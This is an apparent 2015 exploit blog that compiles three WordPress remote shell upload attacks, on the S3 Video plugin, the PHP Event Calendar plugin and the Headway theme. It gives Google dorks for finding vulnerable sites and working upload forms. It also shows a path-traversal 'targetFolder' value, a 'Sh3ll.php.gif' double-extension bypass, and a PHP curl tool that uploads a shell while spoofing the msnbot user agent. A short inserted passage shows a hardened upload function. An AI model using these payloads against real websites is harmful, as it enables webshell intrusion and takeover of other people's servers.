
Friday, 11 December 2015

WordPress Plugins S3 Video Remote Shell Upload


#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulnerability :
/wp-content/plugins/s3-video/includes/uploadify.php

Description :
The WordPress plugin S3 Video suffers from an Uploadify vulnerability: a remote attacker can upload a file/shell/backdoor and execute commands or disclose some local files.

Solution:
Upgrade to the new, patched version.

-- Proof Of Concept --

You can use remote (XAMPP), but I'd do it the simple way: I will use the CSRF method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>
</form>


Shell Path : Here !!


Thursday, 05 November 2015

WordPress PHP Event Calendar 1.5 Arbitrary File Upload




#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :

<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/

// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
// BUG: the destination directory is read straight from the request.
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));

// The token check is commented out, so nothing ties the request to a logged-in user.
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    $targetPath = $targetFolder;
    // BUG: the stored name is built from request data (user_id and the client file name).
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;

    // Validate the file type
    // BUG: only the last extension of the client file name is checked, never the content.
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    $fileParts = pathinfo($_FILES['Filedata']['name']);

    if (in_array($fileParts['extension'],$fileTypes)) {
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }
}

&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if supported) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" ><br>
<input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
<input type="text" name="user_id" value="3xploi7" id="file" ><br>
<input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Access ? Here
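
A hardened counterpart to the Bug Code in the advisory above, added here as an example; it is not the plugin's own code or its actual fix. It assumes the request has already been authenticated and that `$userId` comes from the session, and `UPLOAD_ROOT`, `ALLOWED_IMAGES` and `store_image_upload()` are hypothetical names.

```php
<?php
// Added example, not the plugin's code. UPLOAD_ROOT, ALLOWED_IMAGES and
// store_image_upload() are hypothetical names chosen for this sketch.

// Assumed location: fixed on the server, with PHP execution disabled for it.
const UPLOAD_ROOT = '/var/www/example/wp-content/uploads/events';

// Allowed extension => MIME type that the file content must match.
const ALLOWED_IMAGES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'png'  => 'image/png',
];

function store_image_upload(array $file, int $userId, string $root = UPLOAD_ROOT): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('No valid upload.');
    }

    // Exactly one suffix is accepted, so "Sh3ll.php.gif" is refused outright
    // instead of passing because its last extension is "gif".
    $name = (string) ($file['name'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
        throw new RuntimeException('Invalid file name.');
    }
    $ext = strtolower($m[1]);

    // The type is decided from the bytes on disk, not from the client's name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ((ALLOWED_IMAGES[$ext] ?? '') !== $mime) {
        throw new RuntimeException('Invalid file type.');
    }

    // Directory and stored name come from the server: no targetFolder, no
    // client file name, and $userId is an integer taken from the session.
    $target = rtrim($root, '/') . '/' . $userId . '_' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store upload.');
    }
    return $target;
}
```

A handler would call `store_image_upload($_FILES['Filedata'], $userId)` after its login and nonce checks and ignore any `targetFolder` or `user_id` field in the request.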


Tuesday, 27 October 2015

Wordpress Headway Themes Shell Upload Vulnerability



#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

· Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php
· When Vulnerable : /home/localhost/public_html/


Proof Of Concept :


Tools Coded by Mr.MaGnoM

<?php


/*
link of tool with video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didn't make an auto exploiter: because the headway theme doesn't have one name
for example you will find /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/
so it is so difficult to make an auto exploiter, so you must first check the complete name of the theme, then

write it on site.com/wp-content/themes/headway(complete name)/library/visual-editor/lib/upload-header.php

shell goes to  : site/wp-content/uploads/headway/header-uploads/shell is stable for all sites

that script is in php, to exploit site by site :/

to understand well, watch the video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/


$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
  echo "\nnot infected\n";
}

?>

Shell Access ? Here